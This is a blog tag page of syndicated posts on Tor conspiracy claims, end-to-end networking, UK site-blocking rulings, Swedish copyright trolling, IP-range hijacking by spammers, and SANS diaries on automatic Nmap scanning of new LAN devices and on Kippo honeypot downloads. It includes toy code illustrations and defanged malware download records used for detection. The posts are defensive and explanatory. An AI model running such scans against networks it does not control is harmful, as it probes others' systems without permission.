Posts tagged ‘ip address’

Errata Security: The Pando Tor conspiracy troll

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

Tor, also known as The Onion Router, bounces your traffic through several random Internet servers, thus hiding the source. It means you can surf a website without it knowing who you are. Your IP address may appear to be coming from Germany when in fact you live in San Francisco. When used correctly, it prevents eavesdropping by law enforcement, the NSA, and so on. It’s used by people wanting to hide their actions from prying eyes, from political dissidents to CIA operatives to child pornographers.
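Conceptually, the “onion” works by nested encryption: the client wraps its message once per relay, and each relay peels exactly one layer, so no single relay sees both who you are and what you are saying. The toy sketch below illustrates only the layering idea; it uses a throwaway hash-based stream cipher, not Tor’s real cryptography (TLS, circuit handshakes, fixed-size cells):

```python
import hashlib

def keystream(key: bytes, length: int) -> bytes:
    # Toy stream cipher: SHA-256 in counter mode. NOT secure, illustration only.
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]

def xor_layer(data: bytes, key: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))

# The client shares one key with each relay on the circuit (hypothetical keys).
relay_keys = [b"entry-node-key", b"middle-node-key", b"exit-node-key"]

# Client side: wrap the payload once per relay, innermost layer for the exit node.
message = b"GET / HTTP/1.1"
cell = message
for key in reversed(relay_keys):
    cell = xor_layer(cell, key)

# In transit: each relay peels exactly one layer as the cell travels the circuit.
for key in relay_keys:
    cell = xor_layer(cell, key)

assert cell == message  # plaintext emerges only after the last layer is removed
```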

Recently, Pando (an Internet infotainment site) released a story accusing Tor of being some sort of government conspiracy.

This is nonsense, of course. Pando’s tell-all exposé of the conspiracy contains nothing that isn’t already widely known. We in the community have long joked about this. We often pretend there is a conspiracy in order to annoy uptight Tor activists like Jacob Appelbaum, but we know there isn’t any truth to it. This really annoys me — how can I troll about Tor’s government connections when Pando claims there’s actually truth to the conspiracy?

The military and government throw research money around with reckless abandon. That no more means they created Tor than it means they created the Internet back in the 1970s. A lot of that research is pure research, intended to help people. Not everything the military funds is designed to kill people.

There is no single “government”. We know, for example, that while some in government paid Jacob Appelbaum’s salary, others investigated him for his Wikileaks connections. Different groups are often working at cross purposes — even within a single department.

A lot of people have ties to the government, including working for the NSA. The NSA isn’t some secret police designed to spy on Americans, so a lot of former NSA employees aren’t people who want to bust privacy. Instead, most NSA employees are sincere in making the world a better place — which includes preventing evil governments from spying on dissidents. As Snowden himself says, the NSA is full of honest people doing good work for good reasons. (That they’ve overstepped their bounds is a problem — but that doesn’t mean they are the devil).

Tor is based on open code and math. It really doesn’t matter what conspiracy lies behind it, because we can see the code. It’s like Bitcoin — we know there is a secret conspiracy behind it, with the secretive Satoshi Nakamoto owning a billion dollars worth of the coins. But that still doesn’t shake our faith in the code and the math.

Dissidents use Tor — successfully. We know that because the dissidents are still alive. Even if it’s a secret conspiracy by the U.S. government, it still does what its supporters want, helping dissidents fight oppressive regimes. In any case, Edward Snowden, who had access to NSA secrets, trusts his own life to Tor.

Tor doesn’t work by magic. I mention this because the Pando article lists lots of cases where Tor failed to protect people. The reasons were unlikely to have been flaws in Tor itself, but appear to have been other, more natural causes. For example, the Silk Road server configuration shows it was reachable directly from the Internet as well as through Tor, a rookie mistake that revealed its location. The perfect concealment system can’t work if you sometimes ignore it. It’s like blaming the Pill for not preventing pregnancy because you took it only on some days but not others. Thus, for those of us who know technically how things work, none of the cases cited by Pando shake our trust in Tor.

I’m reasonably technical. I’ve read the Tor spec (though not the code). I play with things like hostile exit nodes. I fully know Tor’s history and ties to the government. I find nothing in the Pando article that is credible, and much that is laughable. I suppose I’m guilty of getting trolled by this guy, but seriously, Pando pretends not to be a bunch of trolls, so maybe this deserves a response.

SANS Internet Storm Center, InfoCON: green: Guest diary: Detecting Suspicious Devices On-The-Fly, (Tue, Nov 25th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

If you apply classic hardening rules (keep patch levels current, use an AV, enable the firewall, and use them with due diligence), modern operating systems are more and more difficult to compromise today. Extra tools like EMET can also raise the bar. On the other hand, networks are more and more populated with unknown/personal devices, or devices which provide multiple facilities like storage (NAS), printers (MFP), VoIP, IP cameras, …

Because they are easily compromised, such devices make a very good target from which to pivot into the network. They run out of the box: just plug in the network and power cables and they are ready to go! A classic vulnerability management process will detect such devices, but you still risk missing them if you only run a monthly scan. To catch new devices on the fly and get an immediate idea of their attack surface (for example: is a backdoor present?), I’m using the following toolbox: Arpwatch, Nmap and OSSEC as the conductor.

Arpwatch is a tool for monitoring ARP traffic on a LAN. It can detect new MAC addresses or pairing changes (IP/MAC). Nmap is the best-known port scanner, and OSSEC is a log management tool with many features, like a built-in HIDS.

A first piece of good news is that Arpwatch log entries are processed by OSSEC by default. OSSEC also has a great feature called Active Response, which triggers actions (read: executes scripts) when specific conditions are met. In our case, we use it to launch an Nmap scan whenever Arpwatch reports a new or changed host.
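The configuration block from the original diary was lost in syndication. Reconstructed from the description that follows (the script name nmap-scan.sh, the srcip argument, agent 001 and rules 7201/7202 all come from the text), a plausible ossec.conf fragment would look roughly like this; treat it as a sketch, not the author’s exact configuration:

```xml
<command>
  <name>nmap-scan</name>
  <executable>nmap-scan.sh</executable>
  <expect>srcip</expect>
</command>

<active-response>
  <command>nmap-scan</command>
  <location>defined-agent</location>
  <agent_id>001</agent_id>
  <rules_id>7201,7202</rules_id>
</active-response>
```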

The above configuration specifies that nmap-scan.sh will be executed on agent 001, with the source IP reported by Arpwatch as its argument, when rule 7201 or 7202 matches (i.e. when a new host or a MAC address change is detected). The nmap-scan.sh script is based on the existing active-response scripts and spawns an Nmap scan:

nmap -sC -O -oG - -oN ${PWD}/../logs/${IP}.log ${IP} | grep "Ports:" >> ${PWD}/../logs/gnmap.log

This command appends interesting information in grepable format to the gnmap.log file: the open ports (if any) of the detected IP, as in the example below. One line per host will be generated:

Host: 192.168.254.65 (foo.bar.be) Ports: 22/open/tcp//ssh///, 80/open/tcp///, 3306/open/tcp/// …
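If you want to post-process these lines outside OSSEC, the grepable format is easy to parse. A minimal Python sketch (the field layout port/state/protocol/owner/service/… follows Nmap’s -oG output):

```python
import re

def parse_gnmap_line(line: str):
    """Parse one 'Host: ... Ports: ...' line from Nmap grepable (-oG) output."""
    host_match = re.search(r"Host:\s+(\S+)\s+\(([^)]*)\)", line)
    ports_match = re.search(r"Ports:\s+(.*)", line)
    if not host_match or not ports_match:
        return None
    ip, hostname = host_match.groups()
    open_ports = []
    for entry in ports_match.group(1).split(","):
        # Each entry is port/state/protocol/owner/service/rpcinfo/version
        fields = entry.strip().strip("\u2026 ").split("/")
        if len(fields) >= 3 and fields[1] == "open":
            service = fields[4] if len(fields) > 4 else ""
            open_ports.append((int(fields[0]), fields[2], service))
    return {"ip": ip, "hostname": hostname, "open_ports": open_ports}

line = "Host: 192.168.254.65 (foo.bar.be) Ports: 22/open/tcp//ssh///, 80/open/tcp///, 3306/open/tcp///"
result = parse_gnmap_line(line)
# result["open_ports"] -> [(22, 'tcp', 'ssh'), (80, 'tcp', ''), (3306, 'tcp', '')]
```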

OSSEC is a wonderful tool and can decode this format by default. Just configure gnmap.log as a new events source:
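The events-source snippet was also stripped in syndication. OSSEC ships an nmapg log format for exactly this output, so the ossec.conf addition would plausibly look like this (the path is taken from the command earlier in the post):

```xml
<localfile>
  <log_format>nmapg</log_format>
  <location>/var/ossec/logs/gnmap.log</location>
</localfile>
```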

And new alerts will be generated:

2014 Oct 27 17:54:23 (shiva) 192.168.254.1->/var/ossec/logs/gnmap.log
Rule: 581 (level 8) – Host information added.
Host: 192.168.254.65 (foo.bar.be), open ports: 22(tcp) 80(tcp) 3306(tcp)

By using this technique, you will immediately detect new hosts connected to the network (or an IP address paired with a new MAC address), and you’ll get the list of services running on them, as well as the detected operating system (if fingerprinting is successful). Happy hunting!

Xavier Mertens

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Errata Security: That wraps it up for end-to-end

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

The defining feature of the Internet back in 1980 was “end-to-end”, the idea that all the intelligence was at the “ends” of the network, and not in the middle. This feature is becoming increasingly obsolete.

This was a radical design at the time. Big corporations and big government still believed in the opposite model, with all the intelligence in big “mainframe” computers at the core of the network. Users would just interact with “dumb terminals” on the ends.

The reason the Internet was radical was the way it gave power to the users. Take video phones, for example. AT&T had been promising this since the 1960s, as the short segment in “2001: A Space Odyssey” showed. However, getting that feature to work meant replacing all the equipment inside the telephone network. Telephone switches would need to know the difference between a normal phone call and a video call. Moreover, there could be only one standard, worldwide, so that calling Japan or Europe would work with their video telephone systems. Users were powerless to develop video calling on their own — they would have to wait for the big telecom monopolies to develop it, however long that took.

That changed with the Internet. The Internet carries packets without knowing their content. Video calling with Facetime or Skype or LINE is just an app, from your iPhone or Android or PC. People keep imagining new applications for the Internet every day, and implement them, without having to change anything in core Internet routing hardware.

I’ve used Facetime, Skype, and LINE to talk to people in Japan. That’s because there is no real international standard for video calling. Each person I call requires me to install whichever app they are using. Traditional thinking is that government ought to create standards, so that every app would be compatible with every other app, so that I could Skype from Windows to somebody’s iPhone using Facetime. This tradition is nonsense. If we waited for government standards, it’d take forever. Teenagers who heavily use video today would be grown up with kids of their own before government got around to creating the right standard. Lack of standards means freedom to innovate.

Such freedom was almost not the case. You may have heard of something called the “OSI 7 Layer Model”. Everything you know about that model is wrong. It was an attempt by Big Corporations and Big Government to enforce their model of core-centric networking. It demanded such things as a “connection oriented network protocol”, meaning smart routers rather than the dumb ones we have today. It demanded that applications be standardized, so that there would be only one video conferencing standard, for example. Governments in the US, Japan, and Europe mandated that the computers they bought support OSI-conformant protocols. (The Internet’s TCP/IP protocols do not conform to the OSI model.) Such rules were on the books into the late 1990s dot-com era, when many in government still believed that the TCP/IP Internet was just a brief experiment on the way to a Glorious Government OSI Internetwork.

The Internet did have standards, of course, but they were developed in the opposite manner. Individuals innovated first, on the ends of the network, developing apps. Only when such apps became popular did they finally get documented as a “standard”. In other words, Internet standards were more de facto than de jure. People innovated first, on their own ends of the network, and the infrastructure and standards caught up later.

But here’s the thing: the Internet ideal of end-to-end isn’t perfect, either. There are reasons why not all innovation happens on the ends.

Take your home network as an example. The way your home likely works is that you have a single home router with cable/fiber/DSL on one side talking to the Internet, and WiFi on the other side talking to the devices in your home. Attached to your router you have a desktop computer, a couple notebooks, an iPad, your phones, an Xbox/Playstation, and your TV.

In the true end-to-end model, all these devices would be on the Internet directly — they could be “pinged” from the Internet. In today’s reality, though, that’s not the way things work. Your home router is a firewall. It blocks incoming connections, so that devices in your home can connect outwards, but nothing on the Internet can connect inwards. This fundamentally breaks the ideal of end-to-end, as a smart device sits in the network controlling access to the ends.

This is done for two reasons. The first is security, so that hackers can’t hack the devices in your home. Blocking inbound traffic blocks 99% of hacker attacks against devices.

The second reason for smart home routers is the well-known limitation on Internet addresses: there are only 4 billion of them. However, there are more than 4 billion devices connected to the Internet. To fix this, your home router does address translation. Your router has only a single public Internet address. All the devices in your home have private addresses that wouldn’t work on the Internet. As packets flow in/out of your home, your router transparently changes the private addresses in the packets into the single public address.

Thus, when you google “what’s my IP address”, you’ll get a different address than your local machine. Your machine will have a private address like 10.x.x.x or 192.168.x.x, but servers on the Internet won’t see that — they’ll see the public address you’ve been assigned by your ISP.
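The translation step can be sketched as a toy model: the router keeps a table keyed by (private address, private port), rewrites outgoing packets to its single public address, and maps replies back. A minimal sketch with made-up addresses; real NAT also handles timeouts, protocols, and port collisions:

```python
import ipaddress

PUBLIC_IP = "203.0.113.7"  # the router's single public address (documentation range)

class ToyNAT:
    def __init__(self):
        self.table = {}    # (private_ip, private_port) -> public_port
        self.reverse = {}  # public_port -> (private_ip, private_port)
        self.next_port = 40000

    def outbound(self, src_ip, src_port):
        """Rewrite an outgoing packet's source to the router's public address."""
        assert ipaddress.ip_address(src_ip).is_private
        key = (src_ip, src_port)
        if key not in self.table:
            self.table[key] = self.next_port
            self.reverse[self.next_port] = key
            self.next_port += 1
        return PUBLIC_IP, self.table[key]

    def inbound(self, dst_port):
        """Map a reply arriving at the public address back to the private host."""
        # None means drop: no inbound connection without a prior outbound one,
        # which is exactly the "fail closed" behavior described later in the post.
        return self.reverse.get(dst_port)

nat = ToyNAT()
pub = nat.outbound("192.168.1.10", 51000)  # a laptop opens a connection
reply_dst = nat.inbound(pub[1])            # the server's reply comes back
```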

According to Gartner, nearly a billion smartphones were sold in 2013. These are all on the Internet. That represents a quarter of the Internet address space used up in only a single year. Yet, virtually none of them are assigned real Internet addresses. Almost all of them are behind address translators — not the small devices like you have in your home, but massive translators that can handle millions of simultaneous devices.

The consequence is this: there are more devices with private addresses, that must go through translators, than there are devices with public addresses. In other words, less than 50% of the Internet is end-to-end.

The “address space exhaustion” of traditional Internet addresses inspired an update to the protocol with larger addresses, known as IPv6. It uses 128-bit addresses: 4 billion times 4 billion times 4 billion times 4 billion. This is enough to assign a unique address to all the grains of sand on all the beaches on Earth. It’s enough to restore end-to-end access to every device on the Internet, times billions and billions.
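The arithmetic is easy to check: IPv4’s 32-bit space holds about 4.3 billion addresses, and IPv6’s 128 bits are exactly four such factors multiplied together:

```python
ipv4_space = 2 ** 32   # ~4.3 billion addresses
ipv6_space = 2 ** 128  # "4 billion times 4 billion times 4 billion times 4 billion"

assert ipv6_space == ipv4_space ** 4
print(ipv6_space)  # 340282366920938463463374607431768211456
```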

My one conversation with Vint Cerf (one of the key Internet creators) was over this address space issue. Back in 1992, every Internet engineer knew for certain that the Internet would run out of addresses by around the year 2000. Every engineer knew this would cause the Internet to collapse. At the IETF meeting, I tried to argue otherwise. I used the Simon-Ehrlich Wager as an analogy. Namely, the 4 billion addresses weren’t a fixed resource, because we would become increasingly efficient at using them. For example, “dynamic” addresses would use space more efficiently, and translation would reuse addresses.

Cerf’s response was the tautology “but that would break the end-to-end principle”.

Well, yes, but no such principle should be a straitjacket. The end-to-end principle is already broken by hackers. Even with IPv6, when all your home devices have a public rather than private address on the Internet, you still want a firewall blocking inbound connections, breaking the end-to-end principle. Once you’ve decided to firewall a network, it no longer matters whether it’s using IPv6 or address translation of private addresses. Indeed, address translation is better for firewalling, as it defaults to “fail closed”: if a failure occurs, all communication is blocked. With IPv6, firewalls become “fail open”, where failures allow communication to continue.

Firewalls are only the start in breaking end-to-end. It’s the “cloud” where we see a radical reversion back to old principles.

Your phone is no longer a true “end” of the network. Sure, your phone has a powerful processor that’s faster than supercomputers of the last decade, but that power is used primarily for display, not for computation. Your data and computation instead live in the cloud. Indeed, when you lose or destroy your phone, you simply buy a new one and “restore” it from the cloud.

Thus, we are right back to the old world of smart core network with “mainframes”, and “dumb terminals” on the ends. That your phone has supercomputer power doesn’t matter — it still does just what it’s told by the cloud.

But the last nail in the coffin to the “end-to-end” principle is the idea of “net neutrality”. While many claim it’s a technical concept, it’s just a meaningless political slogan. Congestion is an inherent problem of the Internet, and no matter how objectively you try to solve it, it’ll end up adversely affecting somebody — somebody who will then lobby politicians to rule in their favor. The Comcast-NetFlix issue is a good example where the true technical details are at odds with the way this congestion issue has been politicized. Things like “fast-lanes” are everywhere, from content-delivery-networks to channelized cable/fiber. Rhetoric creates political distinctions among various “fast-lanes” when there are no technical distinctions.

This politicization of the Internet ends the personal control over the Internet that was promised by end-to-end. Instead of being able to act first and asking for forgiveness later, you must first wait for permission from Big Government. Instead of being able to create your own services, you must wait for Big Corporations (the only ones that can afford lawyers to lobby government) to deliver those services to you.

Conclusion

We aren’t going to regress completely to the days of mainframes, of course, but we’ve given up much of the territory of individualistic computing. In some ways, this is a good thing. I don’t want to manage my own data, losing it when a hard drive crashes because I forgot to back it up. In other ways, it’s a bad thing. The more we regulate the Internet to ensure good things, the more we stop innovations that don’t fit within our preconceived notions. Worse, the more it’s regulated, the more companies have to invest in lobbying the government for favorable regulation, rather than developing new technology.

TorrentFreak: If Illegal Sites Get Blocked Accidentally, Hard Luck Says Court

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

The movie and music industries have obtained several High Court orders which compel UK ISPs to block dozens of websites said to facilitate access to copyright-infringing content. Recently, however, they have been joined by those seeking blockades on trademark grounds.

The lead case on this front was initiated by Cartier and Mont Blanc owner Richemont. The company successfully argued that several sites were infringing on its trademarks and should be blocked by the UK’s leading ISPs.

The case is important not only to trademark owners but also to those operating in the file-sharing arena since the High Court is using developments in one set of cases to determine the outcome of legal argument in the other.

The latest ruling concerns potential over-blocking. In some cases target sites move to IP addresses that are shared with other sites that are not covered by an injunction. As a result, these third-party sites would become blocked if ISPs filter their IP addresses as ordered by the Court.

To tackle this problem Richemont put forward a set of proposals to the Court. The company suggested that it could take a number of actions to minimize the problem including writing to the third-party sites informing them that a court order is in force and warning them that their domains could become blocked. The third party sites could also be advised to move to a new IP address.

Complicating the issue is the question of legality. While third-party sites aren’t mentioned in blocking orders, Richemont views some of them as operating unlawfully. When the company’s proposals are taken as a package and sites are operating illegally, Richemont believes ISPs should not be concerned over “collateral damage.”

Counsel for the ISPs disagreed, however, arguing that the Court had no jurisdiction to grant such an order. Mr Justice Arnold rejected that notion and supported Richemont’s efforts to minimize over-blocking in certain circumstances.

“The purpose of Richemont’s proposal is to ensure that the [blocking] order is properly targeted, and in particular to ensure that it is as effective as possible while avoiding what counsel for Richemont described as ‘collateral damage’ to other lawful website operators which share the same IP address,” the Judge wrote.

“If the websites are not engaged in lawful activity, then the Court need not be concerned about any collateral damage which their operators may suffer. It is immaterial whether the Court would have jurisdiction, or, if it had jurisdiction, would exercise it, to make an order requiring the ISPs to block access to the other websites.”

The ISPs further argued that the Court’s jurisdiction to adopt Richemont’s proposals should be limited to sites acting illegally in an intellectual property rights sense. The argument was rejected by the Court.

Also of note was the argument put forward by the ISPs that it is the Court’s position, not anyone else’s, to determine if a third-party site is acting illegally or not. Justice Arnold said he had sympathy with the submission, but rejected it anyway.

“As counsel for Richemont submitted, the evidence shows that, in at least some cases, it is perfectly obvious that a particular website which shares an IP address with a Target Website is engaged in unlawful activity. Where there is no real doubt about the matter, the Court should not be required to rule,” the Judge wrote.

“Secondly, and perhaps more importantly, Richemont’s proposal gives the operators of the affected websites the chance either to move to an alternative server or to object before the IP address is blocked. If they do object, the IP address will not be blocked without a determination by the Court.”

In summary, any third-party site that shares an IP address with a site featured in a blocking order will get no sympathy from the High Court if, in Richemont’s assessment, it is acting illegally. The fact that it is not mentioned in an order will not save it, but it will have a chance to object before being blocked by UK ISPs.

“This action is about protecting Richemont’s Maisons and its customers from the sale of counterfeit goods online through the most efficient means, it is not about restricting freedom of speech or legitimate activity,” the company previously told TF.

“When assessing a site for blocking, the Court will consider whether the order is proportionate – ISP blocking will therefore only be used to prevent trade mark infringement where the Court is satisfied that it is appropriate to do so.”

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Liam Neeson Downloaders Face Anti-Piracy Shakedown

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

File-sharers in the United States, Germany and the UK are particularly familiar with the tactics of so-called copyright trolls. In recent years the lucrative nature of the business has attracted many companies, all out to turn piracy into profit.

Most countries have managed to avoid the attentions of these outfits, Sweden, the spiritual home of The Pirate Bay, included. However, in a surprise move the Scandinavian country has now appeared on the file-sharing lawsuit radar.

Along with Universal Pictures and Studio Canal, Check Entertainment is one of the companies behind the 2014 Liam Neeson movie Non-Stop. According to the latest figures from Box Office Mojo it has done very well, bringing in more than $222 million on a $50 million budget.

Nevertheless, according to Dagens Media, Check Entertainment has hired law firm Nordic Law to go to court in Sweden to obtain the identities of individuals said to have downloaded and shared the action thriller.

The U.S.-based company has targeted subscribers of five local Internet service providers – Com Hem, Bredbandsbolaget, Bahnhof, Telia Sonera and Telenor – with the aim of forcing them to turn over the names and addresses of 12 of their Internet subscribers. Data on the alleged file-sharers was captured by German anti-piracy outfit Excipio.

At this point Check Entertainment says it wants to “investigate and prosecute” the subscribers for alleged copyright infringement but if cases in the rest of the world are any yardstick the aim will be a cash settlement, not a full court case.

Interestingly, one ISP from the five has indicated that its customers do not have to be concerned about possible lawsuits or shakedowns.

Service provider Bahnhof, a company long associated with subscriber privacy, says it is currently the only ISP in the Swedish market that does not store data on its customers’ Internet activities.

The development dates back to April, when the EU Court of Justice declared the Data Retention Directive to be invalid. In response, many Swedish ISPs stopped storing data, but since then most have reversed that decision in order to comply with apparent obligations under the Swedish Electronic Communications Act. Bahnhof did not, however.

This means that even if the ISP is ordered by the court to reveal which subscribers were behind a particular IP address at a certain time, it has no data and simply cannot comply.

“We have no such data. We turned off data storage on the same day that the EU judgment was handed down,” Bahnhof CEO Jon Karlung told Dagens Media.

While Sweden has a long tradition of file-sharing and the state regularly prosecutes large scale file-sharers, actions against regular sharers of a single title are extremely rare, ‘trolling’ even more so.

“It’s pretty rare,” Karlung says. “It has been quite a long time since it happened last.”

The big question now is whether the courts will be sympathetic to Check Entertainment’s complaint.

“We have submitted [our case] to the district court and now we want to see what the service providers say in response,” Nordic Law’s Patrick Andersson concludes.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: Network Hijackers Exploit Technical Loophole

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Spammers have been working methodically to hijack large chunks of Internet real estate by exploiting a technical and bureaucratic loophole in the way that various regions of the globe keep track of the world’s Internet address ranges.

Last week, KrebsOnSecurity featured an in-depth piece about a well-known junk email artist who acknowledged sending from two Bulgarian hosting providers. These two providers had commandeered tens of thousands of Internet addresses from ISPs around the globe, including Brazil, China, India, Japan, Mexico, South Africa, Taiwan and Vietnam.

For example, a closer look at the Internet addresses hijacked by one of the Bulgarian providers — aptly named “Mega-Spred” with an email contact of “abuse@grimhosting” — shows that this provider has been slowly gobbling up far-flung IP address ranges since late August 2014.

This table, with data from the RIPE NCC, one of the regional Internet Registries, shows IP address hijacking activity by Bulgarian host Mega-Spred.


According to several security and anti-spam experts who’ve been following this activity, Mega-Spred and the other hosting provider in question (known as Kandi EOOD) have been taking advantage of an administrative weakness in the way that some countries and regions of the world keep tabs on the IP address ranges assigned to various hosting providers and ISPs.

IP address hijacking is hardly a new phenomenon. Spammers sometimes hijack Internet address ranges that go unused for periods of time. Dormant or “unannounced” address ranges are ripe for abuse partly because of the way the global routing system works: Miscreants can “announce” to the rest of the Internet that their hosting facilities are the authorized location for given Internet addresses. If nothing or nobody objects to the change, the Internet address ranges fall into the hands of the hijacker.
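A toy model makes the mechanism concrete: without validation, routers believe the most specific announcement they hear, so a hijacker announcing a more specific route for dormant space wins. The prefixes and AS numbers below are made up for illustration:

```python
import ipaddress

class ToyRouteTable:
    """Longest-prefix-match table with no origin validation: believes any announcement."""

    def __init__(self):
        self.routes = {}  # prefix -> announcing (origin) AS

    def announce(self, prefix: str, origin_as: int):
        # Nothing and nobody objects, so the announcement is simply accepted.
        self.routes[ipaddress.ip_network(prefix)] = origin_as

    def lookup(self, address: str):
        addr = ipaddress.ip_address(address)
        matches = [p for p in self.routes if addr in p]
        if not matches:
            return None
        best = max(matches, key=lambda p: p.prefixlen)  # most specific route wins
        return self.routes[best]

table = ToyRouteTable()
table.announce("198.51.100.0/24", 64500)  # legitimate but dormant holder
table.announce("198.51.100.0/25", 64666)  # hijacker announces a more specific route
owner = table.lookup("198.51.100.10")     # traffic in that half now flows to AS 64666
```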

Experts say the hijackers also are exploiting a fundamental problem with the record-keeping activities of RIPE NCC, the regional Internet registry (RIR) that oversees the allocation and registration of IP addresses for Europe, the Middle East and parts of Central Asia. RIPE is one of several RIRs; the others include ARIN (which handles mostly North American IP space), APNIC (Asia Pacific), LACNIC (Latin America) and AFRINIC (Africa).

Ron Guilmette, an anti-spam crusader who is active in numerous Internet governance communities, said the problem is that a network owner in RIPE’s region can hijack Internet addresses that belong to network owners in regions managed by other RIRs, and if the hijackers then claim to RIPE that they’re the rightful owners of those hijacked IP ranges, RIPE will simply accept that claim without verifying or authenticating it.

Worse yet, Guilmette and others say, those bogus entries — once accepted by RIPE — get exported to other databases that are used to check the validity of global IP address routing tables, meaning that parties all over the Internet who are checking the validity of a route may be doing so against bogus information created by the hijacker himself.

“RIPE is now acutely aware of what is going on, and what has been going on, with the blatantly crooked activities of this rogue provider,” Guilmette said. “However, due to the exceptionally clever way that the proprietors of Mega-Spred have performed their hijacks, the people at RIPE still can’t even agree on how to even undo this mess, let alone how to prevent it from happening again in the future.”

And here is where the story perhaps unavoidably warps into Geek Factor 5. For its part, RIPE said in an emailed statement to KrebsOnSecurity that the RIPE NCC “has no knowledge of the agreements made between network operators or with address space holders”:

“It’s important to note the distinction between an Internet Number Registry (INR) and an Internet Routing Registry (IRR). The RIPE Database (and many of the other RIR databases) combine these separate functionalities. An INR records who holds which Internet number resources, and the sub-allocations and assignments they have made to End Users.

On the other hand, an IRR contains route and other objects — which detail a network’s policies regarding who it will peer with, along with the Internet number resources reachable through a specific ASN/network. There are 34 separate IRRs globally — therefore, this isn’t something that happens at the RIR level, but rather at the Internet Routing Registry level.”

“It is not possible therefore for the RIRs to verify the routing information entered into Internet Routing Registries or monitor the accuracy of the route objects,” the organization concluded.

Guilmette said RIPE’s response seems crafted to draw attention away from RIPE’s central role in this mess.

“It is somewhat disingenuous, I think, for this RIPE representative to wave this whole mess off as a problem with the IRRs when, in this specific case, the IRR that first accepted and then promulgated these bogus routing validation records was RIPE,” he said.

RIPE notes that network owners can help reduce the occurrence of IP address hijacking by taking advantage of Resource Certification (RPKI), a free service to RIPE members and non-members that allows network operators to request a digital certificate listing the Internet number resources they hold. This allows other network operators to verify that routing information contained in this system is published by the legitimate holder of the resources. In addition, the system enables the holder to receive notifications when a routing prefix is hijacked, RIPE said.
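The check RPKI enables can be sketched in a few lines: a ROA binds a prefix (up to a maximum length) to an authorized origin AS, and an announcement is accepted as valid only if a covering ROA authorizes that origin. This is a simplified model with made-up numbers; real validation works on signed objects and distinguishes several states:

```python
import ipaddress

# ROAs: (prefix, max prefix length, authorized origin AS). Hypothetical example data.
roas = [
    (ipaddress.ip_network("203.0.113.0/24"), 24, 64500),
]

def validate(prefix: str, origin_as: int) -> str:
    net = ipaddress.ip_network(prefix)
    covering = [r for r in roas if net.subnet_of(r[0])]
    if not covering:
        return "not-found"  # no ROA covers this prefix at all
    for roa_prefix, max_len, roa_as in covering:
        if origin_as == roa_as and net.prefixlen <= max_len:
            return "valid"
    return "invalid"        # covered by a ROA, but wrong origin or too specific

validate("203.0.113.0/24", 64500)  # the legitimate holder's announcement
validate("203.0.113.0/24", 64666)  # a hijacker's announcement fails validation
```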

While RPKI (and other solutions to this problem, such as DNSSEC) have been around for years, not all network providers currently deploy these security methods. Erik Bais, a director at A2B Internet BV — a Dutch ISP — said that while broader adoption of solutions like RPKI would certainly help in the long run, one short-term fix is for RIPE to block its Internet providers from claiming routes in address ranges managed by other RIRs.

“This is a quick fix, but it will break things in the future for legitimate usage,” Bais said.

According to RIPE, this very issue was discussed at length at the RIPE 69 Meeting in London last week.

“The RIPE NCC is now working with the RIPE community to investigate ways of making such improvements,” RIPE said in a statement.

This is a complex problem to be sure, but I think this story is a great reminder of two qualities about Internet security in general that are fairly static (for better or worse): First, much of the Internet works thanks to the efforts of a relatively small group of people who work very hard to balance openness and ease-of-use with security and stability concerns. Second, global Internet address routing issues are extraordinarily complex — not just in technical terms but also because they require coordination and consensus among multiple stakeholders with sometimes radically different geographic and cultural perspectives. Unfortunately, complexity is the enemy of security, and spammers and other ne’er-do-wells understand and exploit this gap as often as possible.

SANS Internet Storm Center, InfoCON: green: Lessons Learned from attacks on Kippo honeypots, (Mon, Nov 10th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

A number of my fellow Handlers have discussed Kippo [1], an SSH honeypot that can record adversarial behaviour, be it human or machine. Normal behaviour against my set of Kippo honeypots is fairly predictable: a mixture of scanning and probing from known bad IP ranges, from researchers, and from behind Tor, plus would-be attackers manually entering commands from their jump boxes or home machines.

What caught my eye was a number of separate brute-force attacks that succeeded and then manifested the same behaviour, all within a single day. Despite the IP addresses of the scans, the pickup file locations and the downloaded file names all being different, the captured scripts from the Kippo logs and, more importantly in this case, the hashes were identical for the two files [2] [3] that were retrieved and attempted to run on Kippo’s fake system.
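One simple way to surface this kind of pattern, assuming you have already extracted (attacker IP, download URL, file hash) tuples from the Kippo logs, is to group downloads by hash. All of the record values below except the two published MD5s are invented for illustration:

```python
from collections import defaultdict

# Hypothetical, simplified download records extracted from Kippo logs:
# (attacker IP, URL the payload was fetched from, MD5 of the retrieved file).
downloads = [
    ("203.0.113.10", "hxxp://203.0.113.50:8889/badfile1", "0601aa569d59175733db947f17919bb7"),
    ("198.51.100.7", "hxxp://198.51.100.99:8889/x86",     "0601aa569d59175733db947f17919bb7"),
    ("203.0.113.10", "hxxp://203.0.113.50:8889/badfile2", "60ab24296bb0d9b7e1652d8bde24280b"),
]

# Group by file hash: different source IPs and URLs delivering an identical
# binary are a strong hint of a single scripted campaign.
campaigns = defaultdict(set)
for ip, url, md5 in downloads:
    campaigns[md5].add(ip)

for md5, ips in campaigns.items():
    if len(ips) > 1:
        print(f"{md5}: same payload from {len(ips)} distinct IPs, likely one campaign")
```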

So what? you may ask. I like to draw lessons learnt from this type of honeypot interaction, which help provide tactical and operational intelligence that can be passed to other teams to use. Don’t limit this type of information gathering to just the security teams; for example, our friends in audit and compliance need to know what common usernames and passwords are being used in these types of attacks, to keep them current and well advised. A single-line note on a daily report to the security stakeholders may be in order if your organisation is running Internet-facing Linux systems with SSH on TCP port 22.

